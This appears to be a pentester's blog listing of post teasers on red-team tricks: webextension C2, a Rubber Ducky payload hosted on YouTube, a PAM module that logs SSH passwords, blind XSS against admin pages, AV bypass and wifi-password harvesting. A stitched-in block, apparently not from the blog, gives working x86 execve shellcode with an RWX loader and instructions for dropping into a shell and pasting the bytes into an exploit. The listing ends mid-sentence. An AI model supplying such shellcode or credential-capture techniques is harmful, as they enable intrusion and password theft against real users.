Using Firefox webextensions as c2 client
ATTENTION
This technique was tested only on Linux; it will not work on Mac or Windows.
»It’s a trick created during a red team mission where we had a Rubber Ducky that would download a bash script to run GTRS on the victim machine. The problem: the traffic to the C2 would be safe through GTRS, but the infected machine needed to talk directly to the C2 to get our payload, so we had the idea of using YouTube to host our bash payload.
»Today I was introduced to H2 Database, an in-memory, pure-Java database. Because it is an in-memory database, developers mostly use it for learning, unit tests and PoCs, but you can learn more about it on the H2 site.
»Recently I moved to another city to live alone and, as needed, I contracted the only ISP available in my building, NET, one of the worst ISPs in Brazil. They just decided to block all my outbound connections on port 22/ssh, but that’s another story.
»Recently I posted how to get the ssh password using strace, but it is not 100% effective because the strace output changes across distros. So, searching for another approach, I found the site ChokePoint, where they show how to create a PAM module using Python to log failed ssh attempts; all I had to do was change where they log the password. The original script uses the function auth_log when the login fails.
»BEFORE ALL, this is an old trick, but none of the tutorials I found worked for me, so I just wrote my own :). Sometimes when you get root access to a server or a workstation you don’t actually have the root password; sometimes you just exploited the server and got uid 0. What can you do in this case?
»It’s common to find XSS vulnerabilities during web pentests, but sometimes you are testing an application that has more than one interface, such as a user interface and an admin interface. So how can you test for XSS on the admin interface as just a regular user? Well, it’s kind of simple, but it’s not a test that finds every XSS on the admin pages. For example, when you register on an application you provide some information, like name, address, bio and other things, so we can assume that the admin interface displays this information, and we can simply submit XSS payloads in those fields to try to get XSS execution, but not a payload like the most common,
»This year, for the first time, I went to Recife and gave a talk at BWCON, an event organized by the master @Toronto with sponsorship from Tempest and El Pescador; an awesome event, with a crowd of high technical level. My talk was about AV bypass with VBA + PowerShell, something simple but that can save you in some projects where the only entry point into the client’s network is phishing. So I’ll leave here the link to the slides (Gdrive) and the PoC videos.
»When your device is not rooted and you want to analyse some app, you can’t just pull the application’s apk from it, so to do that I use this trick.
»You can find various wordlists on the internet focused on cracking wifi passwords, but they are not the best wordlists to use in Brazil, so how about getting some real Brazilian passwords? There is an app called MandicMagic; it’s a social network where users save the passwords of wifi networks they use or have used. Well, here is our honeypot: we just need to intercept the requests and figure out how the app works. In my first attempt I failed, because all the requests made by the app are pinned, but thanks to Inspeckage it was really easy to bypass: Inspeckage hooks the pinning function. I just followed the tutorial on how to use Genymotion + Inspeckage + Xposed and intercepted all the app’s requests.
»It’s a simple x86 shellcode to call /bin/sh, but the first thing is to understand how sys_execve works. To do so you can access this site, which gives you a list of all the x86 syscalls and the values you need to put in each register; just search for sys_execve.
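The execve register contract described above, carried into working code as an added example (this is not the post's own shellcode): a 25-byte x86-32 stub that runs execve("/bin//sh") with every instruction annotated, helpers that check the properties a practitioner verifies before using such a stub (no NUL bytes, the pushed words reassemble to "/bin//sh", the syscall number is 11), and a loader that only executes the bytes on a 32-bit Linux build. The byte sequence, the helper names and the RWX-mmap loader are my choices; "/bin//sh" is used instead of "/bin/sh" so that the path splits into two full 4-byte pushes, and xor edx,edx is included so the stub does not depend on whatever edx held before it ran.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>
#include <sys/mman.h>

/*
 * sys_execve on x86-32 Linux (int 0x80) expects:
 *   eax = 11          __NR_execve
 *   ebx = filename    pointer to "/bin//sh\0"
 *   ecx = argv        pointer to { "/bin//sh", NULL }
 *   edx = envp        NULL
 * The stub builds these structures on the stack, so it carries no absolute
 * addresses, and it avoids 0x00 bytes so it survives strcpy-style copies.
 */
static const unsigned char shellcode[] = {
    0x31, 0xc0,                   /* xor  eax, eax      ; eax = 0 */
    0x50,                         /* push eax           ; NUL terminator for the path */
    0x68, 0x2f, 0x2f, 0x73, 0x68, /* push 0x68732f2f    ; "//sh" */
    0x68, 0x2f, 0x62, 0x69, 0x6e, /* push 0x6e69622f    ; "/bin" */
    0x89, 0xe3,                   /* mov  ebx, esp      ; ebx -> "/bin//sh" */
    0x50,                         /* push eax           ; argv[1] = NULL */
    0x53,                         /* push ebx           ; argv[0] = "/bin//sh" */
    0x89, 0xe1,                   /* mov  ecx, esp      ; ecx -> argv */
    0x31, 0xd2,                   /* xor  edx, edx      ; envp = NULL */
    0xb0, 0x0b,                   /* mov  al, 11        ; __NR_execve; "mov al" avoids the NULs of "mov eax" */
    0xcd, 0x80                    /* int  0x80          ; enter the kernel */
};

size_t shellcode_len(void) { return sizeof shellcode; }

/* Returns 1 if any byte is 0x00, which would truncate the payload in a string copy. */
int shellcode_has_null(void) {
    for (size_t i = 0; i < sizeof shellcode; i++)
        if (shellcode[i] == 0x00) return 1;
    return 0;
}

/* Reassembles the path exactly as the two pushes lay it out in memory:
 * the second push lands at the lower address, so "/bin" precedes "//sh",
 * and the earlier "push eax" supplies the terminating NUL. Little-endian
 * byte order makes the word 0x6e69622f read as "/bin" in memory. */
void pushed_path(char out[9]) {
    const uint32_t words[2] = { 0x6e69622f, 0x68732f2f };
    for (int w = 0; w < 2; w++)
        for (int b = 0; b < 4; b++)
            out[w * 4 + b] = (char)((words[w] >> (8 * b)) & 0xff);
    out[8] = '\0';
}

/* Pulls the imm8 of the "mov al, imm8" (opcode 0xb0) to confirm __NR_execve == 11. */
int shellcode_syscall_number(void) {
    for (size_t i = 0; i + 1 < sizeof shellcode; i++)
        if (shellcode[i] == 0xb0) return shellcode[i + 1];
    return -1;
}

int main(void) {
    char path[9];
    pushed_path(path);
    printf("%zu bytes, nulls=%d, path=\"%s\", syscall=%d\n",
           shellcode_len(), shellcode_has_null(), path, shellcode_syscall_number());
#if defined(__linux__) && defined(__i386__)
    /* Copy into an RWX mapping and jump to it: only meaningful on 32-bit Linux. */
    void *mem = mmap(NULL, sizeof shellcode, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) { perror("mmap"); return 1; }
    memcpy(mem, shellcode, sizeof shellcode);
    ((void (*)(void))mem)();
#else
    puts("not a 32-bit Linux build; shellcode inspected but not executed");
#endif
    return 0;
}
```

Build with `gcc -m32 -z execstack` on a 32-bit-capable Linux host to actually drop into the shell; on any other host the program still prints the checks, which is the part worth running before pasting the bytes into an exploit.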
»The first thing to do is to run the “file” command, which will indicate that the file is an ELF32. After that the binary was analyzed in r2, and I ended up realizing that I had forgotten to do the simplest and most obvious thing, as I am a certified SGSE (Strings grep Specialist Engineer), so I just executed the following command: